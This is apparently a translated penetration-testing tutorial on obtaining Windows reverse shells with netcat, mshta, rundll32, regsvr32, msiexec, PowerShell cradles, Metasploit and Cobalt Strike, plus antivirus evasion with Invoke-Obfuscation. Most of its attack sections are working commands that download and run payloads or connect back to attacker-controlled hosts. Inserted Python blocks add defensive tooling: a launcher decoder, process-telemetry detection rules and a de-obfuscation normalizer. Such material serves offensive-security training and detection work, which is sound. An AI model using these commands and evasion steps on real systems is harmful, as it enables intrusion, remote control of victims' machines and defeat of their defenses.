Table of contents

  • Reverse shell introduction
  • Common reverse shell methods
    • NetCat (nc)
      • Forward (bind) nc
      • Reverse nc
    • Using mshta.exe
      • MSF modules
        • Method 1 (msfconsole)
        • Method 2 (msfvenom)
      • Cobalt Strike modules
      • HTA attack source code
    • rundll32.exe
      • MSF modules
        • Method 1 (msfconsole)
        • Method 2 (msfvenom)
      • rundll32 loading an HTA
    • regsvr32.exe
      • MSF modules
    • Using msiexec.exe
      • MSF modules
  • PowerShell scripts
    • PowerShell loading remote scripts
    • PowerShell version of nc (powercat)
    • Reverse shell through web_delivery
      • Generated with msfconsole
      • Generated with CS
    • Using PowerShell to execute a .vbs file
    • Using PowerShell to execute a .bat file
  • Bypassing antivirus software
    • Process

Reverse shell introduction

A reverse shell gives us a remote command-line session on the target, through which we issue instructions and control the asset. Shells are divided by the direction of the connection:

  1. Forward (bind) shell: the controlling end (our own machine) sends the connection request to the controlled end (the target machine), which is listening on a port.

    This direction is subject to many obstacles such as firewalls, NAT and routing, and it is hard to make it succeed in practice.

  2. Reverse shell: the controlled end actively sends the connection request to our controlling end.

    This direction is chosen precisely to get around inbound firewall and routing restrictions: outbound connections from the target are far more likely to be allowed.

Common reverse shell methods

NetCat (nc)

Windows normally does not ship with nc. To use it we first have to upload the program to the target machine; find a build online. Note that the -e switch used below only exists in builds compiled with it, such as Ncat from the Nmap project or nc.exe builds with GAPING_SECURITY_HOLE enabled.

Once nc is downloaded, you can cd into the download directory and use it there, or add the nc directory to the PATH environment variable.

Forward (bind) nc

In the forward mode the target machine is prepared first and waits for the attacking machine to connect. So we execute the command on the controlled end first, then connect from the controlling end.

# Controlled end (target)
# Listen (-l) in very verbose mode (-vv) on the given port (-p) and hand the connection to the given program (-e).
nc -lvvp <port> -e <program>
# If the controlled end binds its local PowerShell to port 6543, the controlling end only has to connect to port 6543 to drive that program.
nc -lvvp 6543 -e powershell.exe

# Controlling end (the controlled machine here is 192.168.1.251)
nc <target IP> <port>
nc 192.168.1.251 6543

powershell.exe above can be replaced with cmd.exe. Keep in mind that the Windows firewall blocks inbound connections to the listening port by default, which is the usual reason this mode fails.

Reverse nc

The opposite of the forward mode: now we start the listener on the controlling machine and wait for the controlled machine to connect to us.

# Controlling end
nc -lvvp <port>
# e.g.
nc -lvvp 4567

# Controlled end (the controlling end's address here is 192.168.1.169)
nc -e <program> <controlling end address> <port>
# e.g.
nc -e cmd.exe 192.168.1.169 4567

Using mshta.exe

mshta.exe is the Windows component that interprets and runs HTA (HTML Application) files: an HTML file whose embedded JScript or VBScript runs as a trusted local application rather than inside the browser sandbox. Because it ships with Windows, we can run our .hta Trojan through it to obtain a shell.

MSF modules

Method 1 (msfconsole)

Module: exploit/windows/misc/hta_server

# Load the MSF module
use exploit/windows/misc/hta_server
# This module starts a web server that the target fetches the HTA from, so we need to set srvhost and srvport.
# They specify the IP address and port the server binds to; the default 0.0.0.0 listens on all local addresses.
set srvhost <local IP>
# Payload: I use windows/x64/meterpreter/reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp
# The default target is x86; select the x64 target here
set target 1
# Bind to the attacking machine's IP
set lhost 192.168.1.200
# Start the server
run

After it starts, the module prints the URL of the HTA. Have the target execute mshta <URL> (here: mshta http://192.168.1.200:8080/PgE4ymVU3VQ.hta) and the target machine comes online.

Method 2 (msfvenom)

msfvenom also supports generating .hta files:

# /bin/bash, on the attacking machine: generate the Trojan file
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=4456 -f hta-psh -o 1.hta
# Serve it for the target to download (download URL is now http://192.168.1.200:6123/1.hta)
python3 -m http.server 6123
# In msfconsole, start the listener
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 4456

The target executes mshta http://192.168.1.200:6123/1.hta and comes online.

Cobalt Strike modules

Besides MSF, CS can also generate HTA files and use them.

First select the HTML Application option in the payload generation menu and generate the .hta file.

Then use the file hosting feature in the attack (phishing) menu to open a download service for the target.

Then the target only needs to execute mshta http://43.128.11.131:8081/download/file.ext to come online.

Note: the Trojan generated here is 32-bit and may run into problems on 64-bit hosts. For 64-bit hosts it is better to run a Trojan generated by MSF.

HTA attack source code

Looking at the HTA generated by MSF above, the attack ultimately calls PowerShell to perform the reverse connection; the launcher is obfuscated (an encoded command wrapping a compressed stage) to reduce the chance of being caught by AV software.
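Peeling that launcher apart, as an added example (not the article's code and not Metasploit's): the HTA runs `powershell -nop -w hidden -e <base64>`, where the base64 is the UTF-16LE script, and that script usually carries a second base64 blob which is a gzip-compressed stage. The decoder below reverses both layers so an analyst can read the stage. The sample launcher is constructed here from a harmless stage; `build_launcher` only exists to produce that sample and mirrors the shape of the real thing, it is an assumption rather than the exact MSF template.

```python
"""Decode a PowerShell -EncodedCommand launcher and unpack its gzip stage.

Added example; not code from the original article or from Metasploit.
"""
import base64
import gzip
import re

# -e / -ec / -enc / -EncodedCommand followed by the base64 blob
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# [Convert]::FromBase64String("...") as used by the psh stagers
B64_BLOB = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the script passed via -e/-EncodedCommand (base64 of UTF-16LE), or '' if none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def unpack_stage(script: str) -> str:
    """Extract the FromBase64String blob; gunzip it if it starts with the gzip magic bytes.
    Scripts without an embedded blob are returned unchanged."""
    m = B64_BLOB.search(script)
    if not m:
        return script
    raw = base64.b64decode(m.group(1))
    if raw[:2] == b"\x1f\x8b":
        raw = gzip.decompress(raw)
    return raw.decode("utf-8", errors="replace")


def decode_launcher(cmdline: str) -> str:
    """Full chain: command line -> encoded script -> decompressed stage."""
    return unpack_stage(decode_encoded_command(cmdline))


def build_launcher(stage: str) -> str:
    """Build a launcher of the same shape (assumed layout, used only to make sample input)."""
    blob = base64.b64encode(gzip.compress(stage.encode())).decode()
    stub = ('$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"));'
            'IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream('
            '$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();' % blob)
    enc = base64.b64encode(stub.encode("utf-16-le")).decode()  # no BOM, as -e expects
    return "powershell.exe -nop -w hidden -e " + enc


# Constructed sample: a harmless stage standing in for the meterpreter stager.
SAMPLE_STAGE = "Write-Host 'constructed stage: would connect back to 192.168.1.200:4456'"
SAMPLE_LAUNCHER = build_launcher(SAMPLE_STAGE)

if __name__ == "__main__":
    print(SAMPLE_LAUNCHER[:60] + "...")
    print(decode_encoded_command(SAMPLE_LAUNCHER))
    print(decode_launcher(SAMPLE_LAUNCHER))
```

The same two steps apply to the command line captured from mshta, rundll32 or regsvr32 children in process telemetry, which is why the "skins" discussed later in the article all look alike once decoded.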

rundll32.exe

Those who have used Python know that Python is powerful because of its many supporting libraries: to generate a random number you just call the random library. Windows has the same idea in the form of Dynamic Link Libraries (DLLs), which hold common code and data that different programs can call. rundll32.exe is a Windows program whose job is to load a DLL and call one of its exported functions, which is why it can also be made to load our DLL.

MSF modules

Method 1 (msfconsole)

Module: exploit/windows/smb/smb_delivery. Note that MSF must run as root here, because the module serves the DLL over SMB on port 445, and binding a port below 1024 requires root.

# Load the module
use exploit/windows/smb/smb_delivery
# The target downloads the DLL over SMB, port 445 by default
# Bind to the attacking machine's IP
set lhost 192.168.1.200
# Port 4444 was already in use, so I changed to another port
set lport 4454
run
# The module prints the rundll32.exe command to run on the target, of the form:
# rundll32.exe \\192.168.1.200\kbFWW\test.dll,0

Method 2 (msfvenom)

# On the attacking machine: generate the file
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=5333 -f dll -o test.dll
# Open a web service on the port used in the download URL below, to serve the Trojan
python3 -m http.server 7789
# Start the listener
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 5333

# On the target: download the file (certutil is a native Windows certificate tool; I covered it in my Windows blog on common file transfer methods for penetration testing)
certutil.exe -urlcache -split -f http://192.168.1.200:7789/test.dll
# Execute the DLL; it is better to write the absolute path, and quote it if it contains spaces
rundll32 shell32.dll,Control_RunDLL "C:\pentest tools\test.dll"

rundll32 loading an HTA

rundll32 can load not only DLLs but also HTAs.

# I reuse port 5333 from above, so there is no need to start another listener
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=5333 -f hta-psh > 1.hta
# As above, transfer the Trojan to the target machine
certutil.exe -urlcache -split -f http://192.168.1.200:7785/1.hta
# Call the OpenURL export of url.dll to execute it
rundll32.exe url.dll,OpenURL C:\Users\xunmi\1.hta

regsvr32.exe

regsvr32 is also a DLL-related program: it registers and unregisters OLE controls. OLE (Object Linking and Embedding) controls are DLLs and ActiveX controls recorded in the Windows registry. The tool lives in %SystemRoot%\System32 (C:\Windows\System32) by default.

Common regsvr32 switches and their meaning:
/u  Unregister the server
/i  Call DllInstall, passing the optional [cmdline]; when used with /u, it calls DLL uninstall
/n  Do not call DllRegisterServer; this switch must be used with /i
/s  Silent; do not display message boxes

MSF modules

Module: exploit/multi/script/web_delivery

use exploit/multi/script/web_delivery
# Set the generated attack command to the Regsvr32 format
set target 3
# Select the attack payload
set payload windows/x64/meterpreter/reverse_tcp
# Bind to the attacking machine's IP
set lhost 192.168.1.200
# Set lport and srvport according to the port usage on your machine
run

The module prints a command of the form regsvr32 /s /n /u /i:<URL> scrobj.dll for the target to run: /i makes regsvr32 fetch the scriptlet from the URL, /n and /u keep it from calling DllRegisterServer, and /s hides any message box.

Using msiexec.exe

MSI (Microsoft Installer) packages are installed by msiexec. As I wrote in my Windows AlwaysInstallElevated blog, if an administrator has misconfigured that policy we can abuse the .msi installer to execute commands with elevated privileges; those interested can check it out.

MSF modules

Here msfvenom is used to generate an MSI package carrying the payload:

# Same target as before
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=4578 -f msi > 1.msi
# Serve it for download
python3 -m http.server 6542
# Start the listener
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 4578
# On the target: download and execute (/q quiet, no UI; /i install the package, which msiexec fetches directly from the URL)
msiexec /q /i http://192.168.1.200:6542/1.msi
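The flip side of the mshta, rundll32, regsvr32 and msiexec techniques above, as an added example that is not part of the original article: detection rules over process-creation events, run against a constructed set of events in a Sysmon Event ID 1-like shape (image, parent image, command line). The field names and the sample events are assumptions made for this example; the command lines in them are the ones the article shows, plus two benign-looking ones to confirm the rules do not fire on everything.

```python
"""Flag the LOLBin launch patterns from the article in process-creation telemetry.

Added example; not code from the original article. Event layout is assumed.
"""
import re

LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "cscript.exe", "wscript.exe"}


def _has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.IGNORECASE) is not None


# (rule name, predicate over a normalized event). Each rule maps to one technique above.
RULES = [
    # mshta http://.../x.hta  (hta_server, msfvenom hta-psh, CS HTML Application)
    ("mshta_remote_hta",
     lambda e: e["image"] == "mshta.exe" and _has(r"https?://", e["cmdline"])),
    # rundll32 \\host\share\x.dll,0 (smb_delivery) or rundll32 url.dll,OpenURL x.hta
    ("rundll32_unc_or_openurl",
     lambda e: e["image"] == "rundll32.exe"
     and (_has(r"\\\\[\w.-]+\\", e["cmdline"]) or _has(r"url\.dll\s*,\s*OpenURL", e["cmdline"]))),
    # rundll32 shell32.dll,Control_RunDLL C:\...\x.dll with the DLL outside C:\Windows
    ("rundll32_dll_outside_windows",
     lambda e: e["image"] == "rundll32.exe" and _has(r'[a-z]:\\(?!windows\\)[^,"]*?\.dll', e["cmdline"])),
    # regsvr32 /s /n /u /i:http://... scrobj.dll (web_delivery target 3)
    ("regsvr32_remote_scriptlet",
     lambda e: e["image"] == "regsvr32.exe"
     and _has(r"/i:\s*https?://", e["cmdline"]) and _has(r"scrobj\.dll", e["cmdline"])),
    # msiexec /q /i http://.../x.msi
    ("msiexec_remote_package",
     lambda e: e["image"] == "msiexec.exe" and _has(r"/i\s+https?://", e["cmdline"])),
    # any of these binaries spawning a script host is the tell-tale second stage
    ("lolbin_spawns_script_host",
     lambda e: e["parent_image"] in LOLBINS and e["image"] in SCRIPT_HOSTS),
    # the PowerShell download cradle itself, however it was launched
    ("powershell_download_cradle",
     lambda e: e["image"] in {"powershell.exe", "pwsh.exe"}
     and _has(r"DownloadString|DownloadFile|\s-e(?:nc|ncodedcommand)?\s", e["cmdline"])),
]


def normalize(event: dict) -> dict:
    """Reduce image paths to a lower-case file name so rules do not depend on install paths."""
    out = dict(event)
    for key in ("image", "parent_image"):
        out[key] = event.get(key, "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    out["cmdline"] = event.get("cmdline", "")
    return out


def match_rules(event: dict) -> list:
    e = normalize(event)
    return [name for name, pred in RULES if pred(e)]


def scan(events) -> dict:
    """Map event id -> matched rule names, omitting events that match nothing."""
    hits = {}
    for ev in events:
        names = match_rules(ev)
        if names:
            hits[ev["id"]] = names
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "mshta http://192.168.1.200:8080/PgE4ymVU3VQ.hta"},
    {"id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell.exe -nop -w hidden -e SQBFAFgA"},
    {"id": 3, "image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"rundll32.exe \\192.168.1.200\kbFWW\test.dll,0"},
    {"id": 4, "image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe url.dll,OpenURL C:\Users\xunmi\1.hta"},
    {"id": 5, "image": r"C:\Windows\System32\regsvr32.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://192.168.1.200:8080/abc.sct scrobj.dll"},
    {"id": 6, "image": r"C:\Windows\System32\msiexec.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "msiexec /q /i http://192.168.1.200:6542/1.msi"},
    {"id": 7, "image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},  # system DLL, benign
    {"id": 8, "image": r"C:\Windows\System32\msiexec.exe", "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": r"msiexec /i C:\Temp\app.msi /qn"},  # local package, not flagged by these rules
    {"id": 9, "image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'rundll32 shell32.dll,Control_RunDLL "C:\pentest tools\test.dll"'},
]

if __name__ == "__main__":
    for event_id, names in sorted(scan(SAMPLE_EVENTS).items()):
        print(event_id, names)
```

The parent/child rule is the robust one: whatever obfuscation is applied to the command line, mshta, rundll32, regsvr32 or msiexec spawning powershell.exe is rare in legitimate use and hard for the attacker to avoid with these techniques.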

PowerShell scripts

Many of the reverse shell commands above end up calling PowerShell to make the connection. As the source of the mshta.exe attack above shows, most of the reverse shell payloads we generate are in essence PowerShell scripts wearing different skins.

PowerShell loading remote scripts

# Generate the PowerShell reverse shell script
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=4578 -f psh-reflection -o shell.ps1
# Serve it for download
python3 -m http.server 6542
# Execute on the target: hidden window, execution policy bypassed, script fetched and run in memory (IEX of the remote script)
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.200:6542/shell.ps1')"

After running this command in cmd on the target, cmd spawns a PowerShell child process that carries out our reverse connection.

PowerShell version of nc (powercat)

Open source download: github.com/besimorhino… First we need to get this script to the target.

# Start the nc listener on the attacking machine
nc -lvvp 12345
# Then load the remote script on the target and connect back to the attacking machine
powershell -c "IEX (New-Object System.Net.WebClient).DownloadString('http://43.128.11.131:8000/powercat.ps1'); powercat -c 192.168.1.200 -p 12345 -e cmd"

Reverse shell through web_delivery

Generated with msfconsole

Module: exploit/multi/script/web_delivery

use exploit/multi/script/web_delivery
# General configuration
set payload windows/x64/meterpreter/reverse_tcp
# Target 2 is the PowerShell (PSH) delivery
set target 2
set lhost 192.168.1.200
set lport 8525
run

Generated with CS

The specific usage is as shown in the figure. You only need to find a way to get the generated command executed on the target machine.

Using PowerShell to execute a .vbs file

To run a .vbs we use cscript.exe (or wscript.exe), which can execute WSF, JS and VBScript scripts.

# First generate the .vbs script
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.200 LPORT=7777 -f vbs -o 1.vbs
# Serve it for download
python3 -m http.server 6542
# Start the listener
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 7777
# Execute on the target ($env:TEMP is expanded by PowerShell; it would not expand inside single quotes)
powershell -c "$p = Join-Path $env:TEMP test.vbs; (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.200:6542/1.vbs', $p); Start-Process cscript.exe $p"

Using PowerShell to execute a .bat file

A .bat file is a Windows batch file that Windows can run directly by default, which in theory is quite convenient, but I did not manage to reproduce this method successfully.

# First generate the .bat script
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=192.168.1.200 LPORT=7788 -o 1.bat
# Serve it for download
python3 -m http.server 6542
# Start the listener
handler -p cmd/windows/powershell_reverse_tcp -H 192.168.1.200 -P 7788
# Execute on the target (both variants were tried)
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.200:6542/1.bat')"
powershell -c "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.200:6542/1.bat')"

Bypassing antivirus software

Process

Here I mainly use a PowerShell module called Invoke-Obfuscation to obfuscate the script.

# Set the PowerShell execution policy so our script can run freely
powershell.exe -ep bypass
# Load the module
Import-Module ./Invoke-Obfuscation.psd1
# Start the tool
Invoke-Obfuscation



Set the path of the source script to obfuscate:

SET SCRIPTPATH I:\pentest\tmp\source-reverse-shell.ps1



Set the obfuscation mode:

token\all
1
# or (same effect)
token\all\1



Output the obfuscated file:

OUT I:\pentest\tmp\obfuscated.ps1



Comparing the two files shows the principle of this obfuscation: the keywords of our original code are scrambled (tokens are re-cased, split into concatenated pieces, reordered with the -f format operator and broken up with backticks), so that antivirus signatures built on those strings no longer match our Trojan. Besides token obfuscation, Invoke-Obfuscation offers many other obfuscation and encoding modes.
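Seen from the defender's side, as an added example that is not part of the original article and not Invoke-Obfuscation's own code: the token transformations named above are reversible, and a normalizer that undoes them recovers the keywords a signature looks for. The obfuscated sample below is constructed by hand in the style of Invoke-Obfuscation's token mode; the set of backtick escapes that must be preserved and the limited set of transformations handled (single-quoted concatenation, the -f format operator, backticks, case) are assumptions of this example.

```python
"""Undo common PowerShell token obfuscation so keyword matching works again.

Added example; not code from the original article or from Invoke-Obfuscation.
"""
import re

# Backtick escapes that carry meaning (`n, `t, `0, `", `$ ...); any other backtick is noise.
PS_ESCAPES = set('0abefnrtv`"$')

CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")                     # 'IE'+'X'
FORMAT = re.compile(r"""\(\s*"((?:\{\d+\})+)"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)""")  # ("{1}{0}" -f 'X','IE')
LONE_STRING = re.compile(r"(?<![\w)])\(\s*'([^']*)'\s*\)")             # &('IEX') -> &'IEX'


def strip_ticks(s: str) -> str:
    """Remove backticks that precede a non-escape character, e.g. Ne`w-`Object -> New-Object."""
    out = []
    i = 0
    while i < len(s):
        if s[i] == "`" and i + 1 < len(s) and s[i + 1].lower() not in PS_ESCAPES:
            i += 1  # drop the tick, keep the character it was hiding
            continue
        out.append(s[i])
        i += 1
    return "".join(out)


def join_concat(s: str) -> str:
    """'IE'+'X' -> 'IEX', repeated until no '+' between string literals remains."""
    while True:
        new = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        if new == s:
            return s
        s = new


def resolve_format(s: str) -> str:
    """("{1}{0}" -f 'String','Download') -> 'DownloadString'."""
    def build(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        order = [int(i) for i in re.findall(r"\{(\d+)\}", m.group(1))]
        return "'" + "".join(args[i] for i in order) + "'"
    return FORMAT.sub(build, s)


def normalize_powershell(s: str) -> str:
    """Apply all reversals, then fold case and whitespace for signature matching."""
    s = strip_ticks(s)
    s = join_concat(s)
    s = resolve_format(s)
    s = LONE_STRING.sub(lambda m: "'" + m.group(1) + "'", s)
    return re.sub(r"\s+", " ", s).strip().lower()


def find_keywords(s: str, keywords) -> list:
    """Keywords present after normalization, in the order given."""
    norm = normalize_powershell(s)
    return [k for k in keywords if k in norm]


KEYWORDS = ["iex", "new-object", "net.webclient", "downloadstring"]

# Constructed sample in the style of token obfuscation: none of KEYWORDS appear literally.
SAMPLE_OBFUSCATED = (
    "&('IE'+'X') ((Ne`w-`Ob`ject ('Ne'+'t.W'+'ebC'+'lient'))"
    ".(\"{1}{0}\" -f 'String','Download').Invoke('http://192.168.1.200:6542/shell.ps1'))"
)

if __name__ == "__main__":
    print(normalize_powershell(SAMPLE_OBFUSCATED))
    print(find_keywords(SAMPLE_OBFUSCATED, KEYWORDS))
```

Real scanners go further (they evaluate the script with the PowerShell engine or hook it via AMSI at execution time, when the de-obfuscated text is available regardless of how it was wrapped), which is why this kind of obfuscation buys less against modern AV than a static comparison of the two files suggests.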